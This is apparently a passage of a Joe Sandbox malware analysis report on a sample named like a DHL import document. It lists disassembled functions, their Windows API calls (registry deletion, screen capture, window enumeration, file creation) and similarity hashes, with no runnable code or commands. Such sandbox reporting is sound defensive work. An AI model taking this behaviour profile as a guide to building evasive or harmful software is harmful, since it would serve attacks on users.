                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 008685AD
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008685BA
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 008685C8
                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 008685D7
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 008685E0
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 008685E7
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 008685F8
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,0086FC38,?), ref: 00868611
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00868621
                                                                                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00868641
                                                                                          • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00868671
                                                                                          • DeleteObject.GDI32(00000000), ref: 00868699
                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 008686AF
                                                                                          Similarity
                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 3840717409-0
                                                                                          • Opcode ID: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
                                                                                          • Instruction ID: 8c0ee03b729cd119e666b5452f9cf51484597667cb4de168864900bc147bd730
                                                                                          • Opcode Fuzzy Hash: 1f4cde0ca7867511182f2dbb8825c3d09636034977d6e094a01a874213776753
                                                                                          • Instruction Fuzzy Hash: 0D412875600208EFDB119FA5DC4CEAA7BB8FF99B11F124159F95AEB260DB709901CB20
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00841502
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0084150B
                                                                                          • VariantClear.OLEAUT32(?), ref: 00841517
                                                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 008415FB
                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00841657
                                                                                          • VariantInit.OLEAUT32(?), ref: 00841708
                                                                                          • SysFreeString.OLEAUT32(?), ref: 0084178C
                                                                                          • VariantClear.OLEAUT32(?), ref: 008417D8
                                                                                          • VariantClear.OLEAUT32(?), ref: 008417E7
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 00841823
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                          • API String ID: 1234038744-3931177956
                                                                                          • Opcode ID: 5a0efe8a416a376a05adc904a96916925d1bb22837ae8ebc75c25daf62a4a28b
                                                                                          • Instruction ID: 242e56ca8debf9b197f6f140f768304596f6c0449338067d0e8bd013189e54fe
                                                                                          • Opcode Fuzzy Hash: 5a0efe8a416a376a05adc904a96916925d1bb22837ae8ebc75c25daf62a4a28b
                                                                                          • Instruction Fuzzy Hash: 8BD1BD31A0021DEBDF10AF65D88DAB9BBB5FF48704F158056E446EB680DB38E881DB61
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 0085C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0085B6AE,?,?), ref: 0085C9B5
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085C9F1
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA68
                                                                                            • Part of subcall function 0085C998: _wcslen.LIBCMT ref: 0085CA9E
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0085B6F4
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0085B772
                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0085B80A
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085B87E
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0085B89C
                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0085B8F2
                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085B904
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0085B922
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0085B983
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0085B994
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 146587525-4033151799
                                                                                          • Opcode ID: 122c5a344822a908e8b7f21380bd8b50f8f363081989dcb7767612eeae36db3b
                                                                                          • Instruction ID: d85137b645c670c0b38d93e1ee4ff839a7c1c1b203ec9e2f03703b195c24bfd6
                                                                                          • Opcode Fuzzy Hash: 122c5a344822a908e8b7f21380bd8b50f8f363081989dcb7767612eeae36db3b
                                                                                          • Instruction Fuzzy Hash: C5C17B31204201EFD714DF14C495B2ABBE5FF94309F18859DE99A8B3A2CB75EC49CB92
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 008525D8
                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008525E8
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 008525F4
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00852601
                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0085266D
                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 008526AC
                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 008526D0
                                                                                          • SelectObject.GDI32(?,?), ref: 008526D8
                                                                                          • DeleteObject.GDI32(?), ref: 008526E1
                                                                                          • DeleteDC.GDI32(?), ref: 008526E8
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 008526F3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                          • String ID: (
                                                                                          • API String ID: 2598888154-3887548279
                                                                                          • Opcode ID: 35ad1e0d69e417ebcf009b0aa8d9fa12c14777195a57d627ec0ecbee03f6b098
                                                                                          • Instruction ID: 6c4240b24282d9c3df2f951e5b05fa6b295e9fec621c426edc9043eee227a37a
                                                                                          • Opcode Fuzzy Hash: 35ad1e0d69e417ebcf009b0aa8d9fa12c14777195a57d627ec0ecbee03f6b098
                                                                                          • Instruction Fuzzy Hash: 2861C275D00219EFCF04CFA8D885AAEBBF5FF58310F20852AE955A7250E774A951CF90
                                                                                          APIs
                                                                                          • ___free_lconv_mon.LIBCMT ref: 0080DAA1
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D659
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D66B
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D67D
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D68F
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6A1
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6B3
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6C5
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6D7
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6E9
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D6FB
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D70D
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D71F
                                                                                            • Part of subcall function 0080D63C: _free.LIBCMT ref: 0080D731
                                                                                          • _free.LIBCMT ref: 0080DA96
                                                                                            • Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
                                                                                            • Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0
                                                                                          • _free.LIBCMT ref: 0080DAB8
                                                                                          • _free.LIBCMT ref: 0080DACD
                                                                                          • _free.LIBCMT ref: 0080DAD8
                                                                                          • _free.LIBCMT ref: 0080DAFA
                                                                                          • _free.LIBCMT ref: 0080DB0D
                                                                                          • _free.LIBCMT ref: 0080DB1B
                                                                                          • _free.LIBCMT ref: 0080DB26
                                                                                          • _free.LIBCMT ref: 0080DB5E
                                                                                          • _free.LIBCMT ref: 0080DB65
                                                                                          • _free.LIBCMT ref: 0080DB82
                                                                                          • _free.LIBCMT ref: 0080DB9A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                          • String ID:
                                                                                          • API String ID: 161543041-0
                                                                                          • Opcode ID: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
                                                                                          • Instruction ID: 4b3e038c37f3947ddf00c883df644e602c62581836cf3f487601a93a895efe1b
                                                                                          • Opcode Fuzzy Hash: d221aaea8a0face14a1d2a030a8561422508190393d076870cf9c1a97118f098
                                                                                          • Instruction Fuzzy Hash: 48314A326043059FEBA1AAB9EC49F6A7BE9FF00320F654429E449D71D1DB75EC40CB21
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0083369C
                                                                                          • _wcslen.LIBCMT ref: 008336A7
                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00833797
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0083380C
                                                                                          • GetDlgCtrlID.USER32(?), ref: 0083385D
                                                                                          • GetWindowRect.USER32(?,?), ref: 00833882
                                                                                          • GetParent.USER32(?), ref: 008338A0
                                                                                          • ScreenToClient.USER32(00000000), ref: 008338A7
                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00833921
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0083395D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                                                                          • String ID: %s%u
                                                                                          • API String ID: 4010501982-679674701
                                                                                          • Opcode ID: f8cd6f2478a0f2095b67fc2140483778a3df19f2b8eb906abf559145282ba3f1
                                                                                          • Instruction ID: 7d31e5716ee9d982b44fb3ef6930f71ad187e797cca2bdb9b330812d55d73cd0
                                                                                          • Opcode Fuzzy Hash: f8cd6f2478a0f2095b67fc2140483778a3df19f2b8eb906abf559145282ba3f1
                                                                                          • Instruction Fuzzy Hash: BA91B371204606EFD719DF24C885BBAF7A8FF84350F008629FA99C6190DB70EA45CBD1
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00834994
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 008349DA
                                                                                          • _wcslen.LIBCMT ref: 008349EB
                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 008349F7
                                                                                          • _wcsstr.LIBVCRUNTIME ref: 00834A2C
                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00834A64
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 00834A9D
                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00834AE6
                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00834B20
                                                                                          • GetWindowRect.USER32(?,?), ref: 00834B8B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                          • String ID: ThumbnailClass
                                                                                          • API String ID: 1311036022-1241985126
                                                                                          • Opcode ID: c1e56b72643d81bc27f175f908d645b5d19be7aa3cf4016d144fc8bf3e46e1e3
                                                                                          • Instruction ID: fbdacc9a1dfcc3554b3f169564b21094c55187747c021e7e2f253e13833de065
                                                                                          • Opcode Fuzzy Hash: c1e56b72643d81bc27f175f908d645b5d19be7aa3cf4016d144fc8bf3e46e1e3
                                                                                          • Instruction Fuzzy Hash: C091DC710042099FDB04DF54C885BBABBE8FF84314F04A46AFE85DA196EB74ED45CBA1
                                                                                          APIs
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CC64
                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0085CC8D
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD48
                                                                                            • Part of subcall function 0085CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0085CCAA
                                                                                            • Part of subcall function 0085CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0085CCBD
                                                                                            • Part of subcall function 0085CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0085CCCF
                                                                                            • Part of subcall function 0085CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0085CD05
                                                                                            • Part of subcall function 0085CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0085CD28
                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0085CCF3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                          • API String ID: 2734957052-4033151799
                                                                                          • Opcode ID: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
                                                                                          • Instruction ID: 14c1d695c5ce99c27acdb39cd2e002496f074bc446835827eeb9381fa4f3eaa5
                                                                                          • Opcode Fuzzy Hash: 9e2a95480fdcaa9885983e7d63e96ad25af08737e6d715315ee68a1dc68cf28d
                                                                                          • Instruction Fuzzy Hash: 06318C75901228BFDB219B94DC88EFFBB7CFF06741F010165F906E2240DAB49E499AA0
                                                                                          APIs
                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00843D40
                                                                                          • _wcslen.LIBCMT ref: 00843D6D
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00843D9D
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00843DBE
                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00843DCE
                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00843E55
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00843E60
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00843E6B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                          • String ID: :$\$\??\%s
                                                                                          • API String ID: 1149970189-3457252023
                                                                                          • Opcode ID: ba981c75b77c48d20e7e2fc87b385bf425f3f069849fa711e62ad74e502f8219
                                                                                          • Instruction ID: 6ce5ead48b56516b227a41d75290e3eaf8e9affd5b87a163ab4d3025d414dde4
                                                                                          • Opcode Fuzzy Hash: ba981c75b77c48d20e7e2fc87b385bf425f3f069849fa711e62ad74e502f8219
                                                                                          • Instruction Fuzzy Hash: CE31B271900209ABDB209BA0DC49FEF37BCFF89700F1040B5F605D6160EBB497448B24
                                                                                          APIs
                                                                                          • timeGetTime.WINMM ref: 0083E6B4
                                                                                            • Part of subcall function 007EE551: timeGetTime.WINMM(?,?,0083E6D4), ref: 007EE555
                                                                                          • Sleep.KERNEL32(0000000A), ref: 0083E6E1
                                                                                          • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0083E705
                                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0083E727
                                                                                          • SetActiveWindow.USER32 ref: 0083E746
                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0083E754
                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0083E773
                                                                                          • Sleep.KERNEL32(000000FA), ref: 0083E77E
                                                                                          • IsWindow.USER32 ref: 0083E78A
                                                                                          • EndDialog.USER32(00000000), ref: 0083E79B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                          • String ID: BUTTON
                                                                                          • API String ID: 1194449130-3405671355
                                                                                          • Opcode ID: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
                                                                                          • Instruction ID: 175bf9790af69dd8304b2f357a1c267277790549e9e24ca79848b85cf5cbfa46
                                                                                          • Opcode Fuzzy Hash: b55a1d3a6a7057c5d13d21e3115f3db29c71dc2ae08df7c2f7b812997c3567e4
                                                                                          • Instruction Fuzzy Hash: 33219670240205AFFF219FA4EC9DA353B69F7A6348F111425F556C2AF1DBB59C00CBA5
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0083EA5D
                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0083EA73
                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0083EA84
                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0083EA96
                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0083EAA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: SendString$_wcslen
                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                          • API String ID: 2420728520-1007645807
                                                                                          • Opcode ID: f246c0752349aa29a073879fb213396116b4bd868d2261bcafa95050f2dd8c8c
                                                                                          • Instruction ID: 95da710c978e6f1ee2f2972417a033ef489e474060e08dfe7748a106b9258026
                                                                                          • Opcode Fuzzy Hash: f246c0752349aa29a073879fb213396116b4bd868d2261bcafa95050f2dd8c8c
                                                                                          • Instruction Fuzzy Hash: 2A115131A50269B9DB20B7A2DC4AEFF6E7CFBD1B40F04042AB411E22D1EEB45915C5B0
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,00000001), ref: 00835CE2
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835CFB
                                                                                          • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00835D59
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00835D69
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835D7B
                                                                                          • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00835DCF
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00835DDD
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00835DEF
                                                                                          • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00835E31
                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00835E44
                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00835E5A
                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00835E67
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                                          • String ID:
                                                                                          • API String ID: 3096461208-0
                                                                                          • Opcode ID: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
                                                                                          • Instruction ID: c70fb6daa0da91ce537c15b88a291d9e20177730b9385de4fba561dce0c86dd0
                                                                                          • Opcode Fuzzy Hash: eb930f8fbe14ddf71682072492023bab73fb406c445b06f6049530c193cd89db
                                                                                          • Instruction Fuzzy Hash: 495110B1B00605AFDF18CF68DD89AAE7BB5FB88301F558129F515E7290D7B49E00CB50
                                                                                          APIs
                                                                                            • Part of subcall function 007E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007E8BE8,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8FC5
                                                                                          • DestroyWindow.USER32(?), ref: 007E8C81
                                                                                          • KillTimer.USER32(00000000,?,?,?,?,007E8BBA,00000000,?), ref: 007E8D1B
                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00826973
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269A1
                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000,?), ref: 008269B8
                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,007E8BBA,00000000), ref: 008269D4
                                                                                          • DeleteObject.GDI32(00000000), ref: 008269E6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                          • String ID:
                                                                                          • API String ID: 641708696-0
                                                                                          • Opcode ID: ce4813e779be7dfff67d03bbcde79955a7378a27f358ef98429ce0445c189b81
